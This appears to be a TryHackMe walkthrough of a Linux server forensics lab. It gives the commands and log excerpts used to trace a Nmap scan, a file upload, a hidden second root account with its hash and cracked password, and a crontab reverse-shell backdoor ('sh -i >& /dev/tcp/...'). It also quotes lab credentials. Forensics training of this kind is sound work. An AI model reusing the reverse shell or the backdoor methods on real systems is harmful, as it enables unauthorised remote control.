
Linux Server Forensics

 Tryhackme - Linux Server Forensics 

First VM

  • 10.10.197.91
  • Username - 'fred'
  • Password - 'FredRules!'

#2 :- Navigate to /var/log/apache2?

  fred@acmeweb:~$ cd /var/log/apache2
  fred@acmeweb:/var/log/apache2$ ls
  access.log  error.log  other_vhosts_access.log
  fred@acmeweb:/var/log/apache2$

#3 :- How many different tools made requests to the server? 

 Answer :- 2

#4 :- Name a path requested by Nmap? 

fred@acmeweb:/var/log/apache2$ cat access.log | grep nmap | cut -d '"' -f 2 | sort | uniq

GET /evox/about HTTP/1.1
GET /favicon.ico HTTP/1.1
GET /.git/HEAD HTTP/1.1
GET /HNAP1 HTTP/1.1
GET / HTTP/1.1
GET /nmaplowercheck1618912425 HTTP/1.1
GET /robots.txt HTTP/1.1
IDRT / HTTP/1.1
OPTIONS / HTTP/1.1
POST / HTTP/1.1
POST /sdk HTTP/1.1
PROPFIND / HTTP/1.1
 

Answer :- /nmaplowercheck1618912425 

Web Server Analysis  

#5 :- What page allows users to upload files?

Answer :- contact.php

#6 :- What IP uploaded files to the server? 

fred@acmeweb:/var/log/apache2$ grep "POST" access.log


192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST / HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
Binary file access.log matches
 

Answer :- 192.168.56.24

#7 :- Who left an exposed security notice on the server?

fred@acmeweb:/var/log/apache2$ cat access.log | grep -i dirbus | grep -v 404 | cut -d '"' -f 2 | sort | uniq 

Answer :- fred


#8 :- What command and option did the attacker use to establish a backdoor? 
 
cat /etc/crontab 

root2   sh -i >& /dev/tcp/192.168.56.206/1234 0>&1
 
Answer :- sh -i
 
 
#9 :- What is the password of the second root account? 
 
fred@acmeweb:/$ cd /etc/
fred@acmeweb:/etc$ cat passwd
 
fred:x:1000:1000:fred:/home/fred:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
 
Answer :- mrcake

#1 :- Name one of the non-standard HTTP Requests. 

hint - Grep searches can be inverted using the -v option to select non-matching lines. Search for GET or POST requests.

command - cat access.log | cut -d '"' -f 2 | sort | uniq  

GET /static/img/Turbo.jpg HTTP/1.1
GXWR / HTTP/1.1
OPTIONS / HTTP/1.1
POST /contact.php HTTP/1.1
\x16\x03

Answer :- GXWR

#2 :- At what time was the Nmap scan performed? (format: HH:MM:SS)

fred@acmeweb:/var/log/apache2$ cat access.log | grep -a GXWR
192.168.56.206 - - [20/Apr/2021:13:30:15 +0000] "GXWR / HTTP/1.1" 501 498 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML"

Answer :- 13:30:15

#3 :- What username and hostname combination can be found in one of the authorized_keys files? (format: username@hostname) 

fred@acmeweb:/var/log/apache2$ sudo cat /root/.ssh/authorized_keys
[sudo] password for fred:
 

ssh-rsa [public key omitted] kali@kali

Answer :- kali@kali

#4 :- What is the first command present in root's bash_history file?

fred@acmeweb:/var/log/apache2$ sudo head /root/.bash_history
nano /etc/passwd
exit

Answer :- nano /etc/passwd

Final VM 

#1 :- Figure out what's going on and find the flag. 
 

hint - Use the above to locate and open the script that's causing the errors. You might want to check the IpManager service. Flag format: [XXXXXXXXXX]

fred@acmeweb:~$ systemctl status IpManager.service
● IpManager.service
   Loaded: loaded (/var/lib/network/IpManager.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2021-06-02 13:44:20 UTC; 26s ago
 Main PID: 1462 (bash)
    Tasks: 2 (limit: 499)
   CGroup: /system.slice/IpManager.service
           ├─1462 /bin/bash /etc/network/ZGtsam5hZG1ua2Fu.sh
           └─1485 sleep 10

fred@acmeweb:~$ cat /etc/network/ZGtsam5hZG1ua2Fu.sh
##[gh0st_1n_the_machine]
##
 

Answer :- gh0st_1n_the_machine
